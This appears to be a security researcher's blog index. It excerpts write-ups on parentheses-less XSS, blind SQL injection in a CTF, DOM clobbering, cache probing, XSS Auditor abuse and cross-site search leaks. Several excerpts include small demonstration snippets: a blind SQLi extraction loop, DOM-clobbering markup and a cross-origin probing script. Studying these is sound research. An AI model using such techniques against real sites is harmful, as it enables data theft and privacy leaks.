In recent years, an interesting XSS vector was put on the table by researchers: Parentheses-less XSS.
It is no secret that known payloads can execute arbitrary JavaScript even with a limited charset. One of the simplest payloads out there is
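To illustrate the general idea (a minimal sketch, not necessarily the payload referenced above), one well-known parentheses-less trick is the tagged template literal, which invokes a function with no `(` or `)` at all — the same mechanism behind the classic ``alert`1` `` payload. Here `greet` is a hypothetical stand-in for `alert`:

```javascript
// A tagged template literal calls its tag function without parentheses.
// `greet` stands in for alert(), which is unavailable outside a browser.
const calls = [];
const greet = (strings, ...values) => calls.push(strings.raw[0]);

greet`xss`; // invokes greet() with zero parentheses

console.log(calls[0]); // "xss"
```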
But there was a gap in the research that I attempted to fill:
Executing arbitrary parentheses-less XSS against a strict Content-Security-Policy (CSP)
As a result of my research, I created an XSS challenge…
For the sake of practice, I looked up a few web challenges from TetCTF and noticed an interesting one — ”Secure System”. While solving the challenge, I explored many SQL Injection techniques that you will probably not find in any tutorial. Enjoy reading!
The challenge was to craft a Blind SQL Injection payload without using:
Although the full filter was far more complex, these were the hardest obstacles to overcome.
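To give a feel for how blind extraction works in general (a simplified sketch: the `oracle` function below is a local stand-in for the real HTTP requests, and it ignores the challenge's actual filter), each character of a secret can be recovered with a handful of boolean comparisons via binary search:

```javascript
// Blind SQLi extraction sketch. In a real attack, oracle(pos, code) would
// send a request containing something like
//   ... AND ASCII(SUBSTR(secret, pos+1, 1)) > code
// and return true/false based on the observable page difference.
const secret = 'flag'; // the value the "database" holds (for the demo)
const oracle = (pos, code) => secret.charCodeAt(pos) > code;

function extractChar(pos) {
  let lo = 0, hi = 127; // ASCII range
  while (lo < hi) {
    const mid = (lo + hi) >> 1;
    if (oracle(pos, mid)) lo = mid + 1; // secret char is above mid
    else hi = mid;                      // secret char is at or below mid
  }
  return String.fromCharCode(lo);
}

let out = '';
for (let i = 0; i < secret.length; i++) out += extractChar(i);
console.log(out); // "flag"
```

With 7 requests per character, the whole secret falls out in a few dozen queries — the payload syntax changes per challenge, but the extraction loop stays the same.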
In my previous write-up about DOM Clobbering, I presented a solution to an XSS challenge that involved overriding a CONFIG variable via that technique. I recommend checking the article out, since I will not be explaining the basics of the method here but rather diving deeper into different, complementary techniques.
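As a quick refresher (hypothetical markup, not the challenge's actual code): if a script reads a global like `CONFIG` that was never defined, an injected element whose `id` matches that name becomes reachable under it:

```html
<!-- Attacker-injected markup: clobbers the undefined global CONFIG -->
<a id="CONFIG" href="https://evil.example/">clobbered</a>

<script>
  // The page expected CONFIG to be a configuration object; instead it
  // now resolves to the <a> element, whose toString() returns its href.
  console.log(String(CONFIG)); // "https://evil.example/"
</script>
```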
Three main functionalities were embedded into the website:
A couple of months back, I took part in researching the dangers of Cache Probing Attacks and new ways to exploit the vulnerability across multiple platforms. I was able to prove that it was possible to leak significant information about the user on several Google products, such as their private emails, tokens, credit card numbers, phone numbers, bookmarks, private notes and much more.
This is a write-up for an XSS challenge that popped up on Twitter recently. In this article, I will walk through three different approaches one could take to solve the challenge, including the shortest among the submitted solutions. The latter resulted in a surprising discovery about how HTML is parsed.
If you are familiar with the challenge details and are only interested in knowing the solutions, I recommend scrolling down to the ‘CSP Path bypass’ section.
It was supposed to be a mini-article but turned into at least a medium-sized text. Enjoy reading! :)
The XSS Auditor is a mechanism implemented in several browsers that aims to detect reflected XSS (Cross-Site Scripting) vectors and block or filter each of them.
The XSS Auditor runs during the HTML parsing phase and attempts to find reflections from the request to the response body. It does not attempt to mitigate Stored or DOM-based XSS attacks.
If a possible reflection has been found, Chrome may ignore (neuter) the specific script, or it may block the page from loading with an ERR_BLOCKED_BY_XSS_AUDITOR error page.
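Historically, sites could tune this behavior via the X-XSS-Protection response header; the commonly documented values (the report directive being Chromium-specific) are:

```
X-XSS-Protection: 0                          disable the auditor entirely
X-XSS-Protection: 1                          enable; neuter the reflected script (filter mode)
X-XSS-Protection: 1; mode=block              enable; block the whole page instead of filtering
X-XSS-Protection: 1; report=<reporting-uri>  enable; additionally report detected attacks
```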
The original design http://www.collinjackson.com/research/xssauditor.pdf is the best place to start. …
Google Search has been going through a lot lately due to the outstanding XSS finding by Masato Kinugawa. In this brief article I want to share a bug that, while perhaps not as exciting as the finding mentioned above, is for sure a very cool one that I discovered while sniffing around Google Search recently.
The title, together with the intro image at the side, should already reveal what the vulnerability I found is about: manipulation of the autosuggestion list that pops up when someone searches for phrases on the Google Search website.
Recently, I have been participating in open Bug Bounty programs, mostly focusing on Cross-Site Search Attacks (XS-Search). This write-up is the first of many to come demonstrating a successful cross-site search, here against the books.google.com website. The idea behind the attack comes from the Filemanager task presented during 35C3 CTF, which is based on abusing the Chromium XSS Auditor. By exploiting this vulnerability, an attacker could exfiltrate a user’s private book collections along with their reading history.
When inspecting the source code of the page, I noticed interesting differences between code sources. One of those…
When doing my usual Bug Bounty research routine, I found an interesting behavior on a popular website, let’s say censored.com. Depending on whether the user was authorized to view the page, two completely different responses were served. One came with a
content-type: text/html;charset=utf-8 HTTP header, and the second with no Content-Type header at all, in which case the response defaults to
text/plain. So I asked myself: is there a clever way to differentiate between these two responses? If so, could this be generalized to all websites? What threats does it pose?
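One generic way to tell two cross-origin responses apart (a hedged sketch of the common XS-Leaks probing pattern, not necessarily the technique explored below; the endpoint URL is hypothetical) is to load the target in an error-signalling tag and observe which handler fires:

```html
<script>
  // Probe a cross-origin endpoint by loading it as a script: whether
  // onload or onerror fires can differ between the two responses,
  // leaking one bit of the victim's state (e.g. logged in vs. not).
  const probe = document.createElement('script');
  probe.src = 'https://censored.com/page'; // hypothetical endpoint
  probe.onload  = () => console.log('response variant A');
  probe.onerror = () => console.log('response variant B');
  document.head.appendChild(probe);
</script>
```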
Let’s start with the threats that differentiating between responses mentioned…